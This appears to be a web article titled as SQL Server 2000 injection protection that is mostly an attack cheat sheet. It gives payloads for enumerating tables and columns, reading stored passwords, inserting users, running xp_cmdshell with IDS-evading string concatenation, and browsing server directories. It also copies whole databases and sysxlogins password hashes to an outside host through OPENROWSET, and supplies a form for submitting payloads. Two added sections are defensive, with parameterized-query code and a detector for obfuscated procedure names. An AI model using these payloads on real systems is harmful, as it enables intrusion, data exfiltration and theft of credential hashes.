Updated on 2025-04-11

SQL Server 2000 Injection Protection Collection (II)


Traditional query construction:
select * FROM news where id=... AND topic=... AND .....
admin'and 1=(select count(*) from [user] where username='victim' and right(left(userpass,01),1)='1') and userpass <>'
select 123;--
;use master;--
:a' or name like 'ffff%';-- Shows a user named ffff.
'and 1<>(select count(email) from [user]);--
;update [users] set email=(select top 1 name from sysobjects where xtype='u' and status>0) where name='ffff';--

Explanation:
The statement above fetches the name of the first user table in the database and stores it in the email field of the user ffff.
By viewing ffff's user information you obtain the name of the first table, here called ad.
Next, obtain the ID of this table from its name ad:
ffff';update [users] set email=(select top 1 id from sysobjects where xtype='u' and name='ad') where name='ffff';--

The name of the second table can be obtained the same way:
ffff';update [users] set email=(select top 1 name from sysobjects where xtype='u' and id>581577110) where name='ffff';--
ffff';update [users] set email=(select top 1 count(id) from password) where name='ffff';--
ffff';update [users] set email=(select top 1 pwd from password where id=2) where name='ffff';--

ffff';update [users] set email=(select top 1 name from password where id=2) where name='ffff';--

exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'

The extended stored procedure can then be called in the usual way:
exec xp_webserver

Once the extended stored procedure has been run, it can be removed like this:
sp_dropextendedproc 'xp_webserver'

insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)-

insert into users values( 667,123,123,0xffff)-

insert into users values ( 123, 'admin''--', 'password', 0xffff)-

;and user>0
;;and (select count(*) from sysobjects)>0
;;and (select count(*) from mysysobjects)>0 -- if this succeeds, the back end is an Access database

Some notes on the usual injection points:
(A) ID=49. The injected parameter is numeric, and the original SQL statement looks roughly like:
select * from table name where field=49
The injected parameter becomes ID=49 And [Query Condition], which yields the statement:
select * from table name where field=49 And [Query condition]

(B) Class=Serial. The injected parameter is a string, and the original SQL statement looks roughly like:
select * from table name where field = 'Serial'
The injected parameter becomes Class=Serial' and [Query Condition] and ''=' , which yields the statement:
select * from table name where field = 'Serial' and [Query Condition] and ''=''

(C) A search whose parameter is not filtered, such as keyword=keyword; the original SQL statement looks roughly like:
select * from table name where field like '%keyword%'
The injected parameter becomes keyword=' and [Query Condition] and '%25'=' (%25 is the URL encoding of %), which yields the statement:
select * from table name where field like '%' and [Query Condition] and '%'='%'
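The defensive counterpart of the three query shapes (A), (B) and (C) is to validate the parameter's type and bind it instead of splicing it into the statement. The example below is added here and is not code from the original article; it uses Python's built-in sqlite3 as a stand-in for SQL Server (assumption: a SQL Server driver such as pyodbc accepts the same `?` placeholders), and the `news` table and its rows are constructed sample data.

```python
"""Parameterized versions of query shapes (A), (B) and (C).

Added example. sqlite3 stands in for SQL Server; the table and rows are
constructed so the script runs offline.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build an in-memory table shaped like the page's 'news' example (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table news(id integer, class text, topic text)")
    conn.executemany(
        "insert into news values(?,?,?)",
        [(49, "Serial", "release notes"),
         (50, "Serial", "100% coverage"),
         (51, "Other", "keyword matters")],
    )
    conn.commit()
    return conn


def by_id(conn: sqlite3.Connection, raw_id: str) -> list:
    """Case (A): numeric parameter. Reject anything that is not an integer
    before it gets near the SQL text, then bind the converted value."""
    if not raw_id.isdigit():
        raise ValueError("id must be an integer")
    return conn.execute("select id from news where id = ?", (int(raw_id),)).fetchall()


def by_class(conn: sqlite3.Connection, raw_class: str) -> list:
    """Case (B): string parameter. Bound as a value, so a quote inside it is
    just a character of the value and cannot close the literal."""
    return conn.execute("select id from news where class = ?", (raw_class,)).fetchall()


def like_escape(s: str) -> str:
    """Escape LIKE metacharacters so user text is matched literally."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def by_keyword(conn: sqlite3.Connection, raw_kw: str) -> list:
    """Case (C): LIKE search. The wildcards are added by the code, the user
    text is escaped and bound, and the ESCAPE clause makes the escaping effective."""
    pattern = "%" + like_escape(raw_kw) + "%"
    return conn.execute(
        "select id from news where topic like ? escape '\\'", (pattern,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(by_id(db, "49"))                      # [(49,)]
    print(by_class(db, "Serial' and ''='"))     # [] : no class with that literal name
    print(by_keyword(db, "%"))                  # [(50,)] : only the row containing a literal %
```

Note that with the escaped LIKE pattern a search for `%` returns only the row whose topic actually contains a percent sign; without the escaping it would match every row, which is the same loss of control over the predicate that case (C) exploits.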
;;and (select Top 1 name from sysobjects where xtype='U' and status>0)>0
sysobjects is a SQL Server system table that stores all tables, views, constraints and other objects. xtype='U' and status>0 selects the tables created by users. The statement above takes the first such table name and compares it with 0; the resulting type-conversion error message exposes the table name.

;;and (select Top 1 col_name(object_id('table name'),1) from sysobjects)>0
After obtaining a table name with the previous statement, object_id('table name') returns the internal ID of that table, and col_name(table ID, 1) returns the table's first column name. Changing 1 to 2, 3, 4 ... returns the column names of the guessed table one by one.

The following form is only a convenience for entering these statements:


<iframe name=p src=# width=800 height=350 frameborder=0></iframe>
<br>
<form action=/ target=p>
<input name="id" value="1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--" style="width:750">
<input type=submit value=">>>">
<input type=hidden name=fno value="2, 3">
</form>

Enumerate the data table names:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0);--

This writes the first table name into the field aaa.

After reading the first table name, the second is read the same way by appending and name<>'the table name just obtained' to the condition:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype='u' and status>0 and name<>'vote');--

Then id=1552 and exists(select * from aaa where aaa>5) raises a conversion error that reveals the stored name.

Read the second table name, and continue one by one until none are left.

Column names are read in the same way:
id=1552;update aaa set aaa=(select top 1 col_name(object_id('table name'),1));-

Then id=1552 and exists(select * from aaa where aaa>5) raises an error that reveals the column name.
id=1552;update aaa set aaa=(select top 1 col_name(object_id('table name'),2));-
Again id=1552 and exists(select * from aaa where aaa>5) raises an error that reveals the next column name.

Advanced tips:

[Get the table name] [Update a field to the table name, then read that field's value to obtain the table name]
update table name set field=(select top 1 name from sysobjects where xtype='u' and status>0 [ and name<>'table name already obtained', adding one such clause for each table found]) [ where condition]
select top 1 name from sysobjects where xtype='u' and status>0 and name not in('table1','table2',…)

Create a database administrator account and a system administrator account through the SQL Server injection vulnerability [the current login must be in the SYSADMIN group]

[Get the table's column names] [Update a field to the column name, then read that field's value to obtain the column name]
update table name set field=(select top 1 col_name(object_id('name of the table to be queried'), 1)) [where condition] -- the column ordinal 1 is changed to 2, 3, ... for the following columns

Bypass IDS detection [using variables]
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
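Both evasions shown on this page, splitting a procedure name across concatenated literals (`'xp'+'_cm'+'dshell'`) and spelling a string as `char(0x..)` calls (the `insert into users` statements above), defeat a detector that only searches the raw statement for `xp_cmdshell`. The detector below is an added example, not part of the original article: it folds `char()` calls into literals and joins adjacent quoted fragments before matching, so the obfuscated form is caught. The watch list and the log lines are constructed for the example; a production rule set would also handle whitespace, comment and encoding tricks this page does not cover.

```python
"""Normalize obfuscated T-SQL before matching extended-procedure names.

Added example (not from the original article). Handles the two evasions the
page shows: concatenated string fragments and char(0x..) sequences.
"""
import re

# Procedures and system tables this page uses; constructed watch list for the example.
WATCHLIST = (
    "xp_cmdshell", "xp_dirtree", "xp_subdirs", "xp_availablemedia",
    "xp_servicecontrol", "sp_addextendedproc", "sp_dropextendedproc",
    "openrowset", "sysobjects", "sysxlogins",
)

# char(0x63) or char(99): a single character written as a function call.
_CHAR = re.compile(r"char\(\s*(0x[0-9a-f]+|\d+)\s*\)", re.I)
# The "'+'" glue between two adjacent string literals.
_CONCAT = re.compile(r"'\s*\+\s*'")


def normalize(sql: str) -> str:
    """Fold char() calls into quoted literals, join adjacent literals, lowercase."""
    def to_literal(m: re.Match) -> str:
        v = m.group(1)
        code = int(v, 16) if v.lower().startswith("0x") else int(v)
        return "'" + chr(code) + "'"

    s = _CHAR.sub(to_literal, sql)   # char(0x63)+char(0x68) -> 'c'+'h'
    s = _CONCAT.sub("", s)           # 'c'+'h' -> 'ch';  'xp'+'_cm'+'dshell' -> 'xp_cmdshell'
    return s.lower()


def findings(sql: str) -> list:
    """Watch-list names present in the normalized statement."""
    n = normalize(sql)
    return [w for w in WATCHLIST if w in n]


def scan(lines) -> list:
    """(line_number, hits) for every input line that triggers a finding."""
    out = []
    for i, line in enumerate(lines, 1):
        hits = findings(line)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample of application query-log lines for the example.
SAMPLE_LOG = [
    "select * from news where id = 49 and topic = 'release'",
    "declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\\'",
    "declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\\'",
    "insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 'x', 0xffff)",
    "5';insert into temp(id,num1) exec .xp_dirtree 'c:\\';--",
]

if __name__ == "__main__":
    for line_no, hits in scan(SAMPLE_LOG):
        print(line_no, hits)
```

The fourth sample line decodes to the literal `'chris'` and trips nothing on this watch list; it is still worth logging the decoded form, because the same `char()` trick can spell any procedure name.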

1. Open a remote database
Basic syntax:
select * from OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1' )

Parameters: (1) OLE DB provider name

2. The connection string can specify any address and port, for example:
select * from OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table')

To replicate the whole database of the target host, first establish a connection to the database on the target host (as shown above), then insert every remote table into a local table.

Basic syntax:
insert into OPENROWSET('SQLOLEDB', 'server=servername;uid=sa;pwd=apachy_123', 'select * from table1') select * from table2

This statement copies all data of table2 on the target host into table1 in the remote database. In practice, adjust the IP address and port in the connection string to point where needed, for example:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from table2

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysdatabases')
select * from

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysobjects')
select * from user_database.

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _syscolumns')
select * from user_database.

After that, the structure of the target host's database can be seen from the local database. The rest is straightforward; without further ado, copy the database:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table1') select * from database..table1

insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from table2') select * from database..table2

......

3. Copy the hash table

This is an extension of the database copy above. The hashes of the login passwords are stored in sysxlogins. The method is as follows:
insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;', 'select * from _sysxlogins') select * from

With the hash in hand, it can be brute-forced; that takes a little luck and a lot of time.

Methods to traverse directories:
First create a temporary table named temp:
'5;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
5';insert temp exec .xp_availablemedia;-- Get all current drives
5';insert into temp(id) exec .xp_subdirs 'c:\';-- Get a list of subdirectories
5';insert into temp(id,num1) exec .xp_dirtree 'c:\';-- Get the directory tree structure of all subdirectories and enter the temp table

5';insert into temp(id) exec .xp_cmdshell 'type c:\web\';-- View the contents of a file
5';insert into temp(id) exec .xp_cmdshell 'dir c:\';--
5';insert into temp(id) exec .xp_cmdshell 'dir c:\ *.asp /s/a';--
5';insert into temp(id) exec .xp_cmdshell 'cscript C:\Inetpub\AdminScripts\ enum w3svc'

5';insert into temp(id,num1) exec .xp_dirtree 'c:\';-- (xp_dirtree is executable by PUBLIC)
Check which server roles the current login holds:
Statement 1: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('sysadmin'));-
Statement 2: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('serveradmin'));-
Statement 3: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('setupadmin'));-
Statement 4: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));-
Statement 5: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('securityadmin'));-
Statement 6: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('diskadmin'));-
Statement 7: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-
Statement 8: /down/?id=1 and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-
Statement 9: /down/?id=1 and 1=(select IS_MEMBER('db_owner'));-
Write the paths to a table:
/down/?id=1;create table dirs(paths varchar(100), id int)-
/down/?id=1;insert dirs exec .xp_dirtree 'c:\'-
/down/?id=1 and 0<>(select top 1 paths from dirs)-
/down/?id=1 and 0<>(select top 1 paths from dirs where paths not in('@Inetpub'))-
Statement: /down/?id=1;create table dirs1(paths varchar(100), id int)--
Statement: /down/?id=1;insert dirs exec .xp_dirtree 'e:\web'--
Statement: /down/?id=1 and 0<>(select top 1 paths from dirs1)-